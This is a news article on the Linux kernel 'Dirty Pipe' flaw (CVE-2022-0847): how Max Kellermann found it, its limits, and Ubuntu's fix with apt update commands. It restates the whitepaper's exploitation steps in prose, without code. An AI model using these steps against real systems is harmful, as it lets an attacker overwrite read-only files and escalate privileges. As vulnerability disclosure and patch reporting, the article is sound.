A new vulnerability was discovered in the Linux kernel by Max Kellermann in April 2021, which can be tracked as CVE-2022-0847. It affects Linux kernel 5.8 and later versions. A customer asked Kellermann to fix the corrupted log files that failed to decompress due to CRC errors. After months-long digging, he managed to find the problem.
The bug works in a very specific condition
According to Kellermann’s whitepaper about the bug, it is possible to corrupt files in storage because of the bug in the Linux kernel. It allows overwriting the page cache without writers, with no timing constraints, at arbitrary positions with arbitrary data. Kellermann has provided the limitations of the bug:
- The attacker must have read permissions (because it needs to splice() a page into a pipe)
- The offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe)
- The write cannot cross a page boundary (because a new anonymous buffer would be created for the rest)
- The file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended)
After several months of inspection, Kellermann has also provided information regarding the exploitation of the vulnerability. To exploit the CVE-2022-0847 “Dirty Pipe” bug, attackers need to follow those steps:
- Create a pipe.
- Fill the pipe with arbitrary data (to set the PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).
- Drain the pipe (leaving the flag set in all struct pipe_buffer instances on the struct pipe_inode_info ring).
- Splice data from the target file (opened with O_RDONLY) into the pipe from just before the target offset.
- Write arbitrary data into the pipe; this data will overwrite the cached file page instead of creating a new anonymous struct pipe_buffer because PIPE_BUF_FLAG_CAN_MERGE is set.
Canonical has already fixed Ubuntu
Canonical has pushed Ubuntu 21.10 and 20.04 LTS to fix the Dirty Pipe vulnerability. According to Canonical, the bug affects only those Ubuntu versions using Linux kernel 5.13. The organization has also added a few more security fixes into the basket and urges Ubuntu users to update their software immediately. You can use the following commands to update:
sudo apt update
sudo apt full-upgrade